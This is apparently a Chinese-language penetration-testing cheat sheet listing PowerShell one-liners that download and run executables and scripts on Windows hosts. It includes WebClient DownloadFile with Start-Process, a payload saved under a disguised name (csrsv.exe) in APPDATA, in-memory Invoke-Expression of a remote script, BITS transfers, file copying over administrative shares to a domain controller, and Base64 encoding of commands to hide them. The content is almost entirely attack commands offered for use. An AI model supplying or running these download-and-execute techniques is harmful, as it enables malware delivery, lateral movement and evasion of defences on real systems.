powershell
1
注意:内核5.2以下版本可能无效
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
2
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4
高版本
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt –UseBasicParsing
5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates
>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"
6
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://xxx.xx.xx.xx/test.ps1")
7
echo (new-object System.Net.WebClient).DownloadFile('http://192.168.1.3/tomcat.exe','C:/Users/test/cc.exe')| powershell -
8
$Text = "(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx/evil.txt','evil.txt')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
解码
$EncodedText = "dwByAGkAxxxxxxxxxxxxxxxxxxxAG0AbgB0AG4AJwA="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
$DecodedText
最后更新于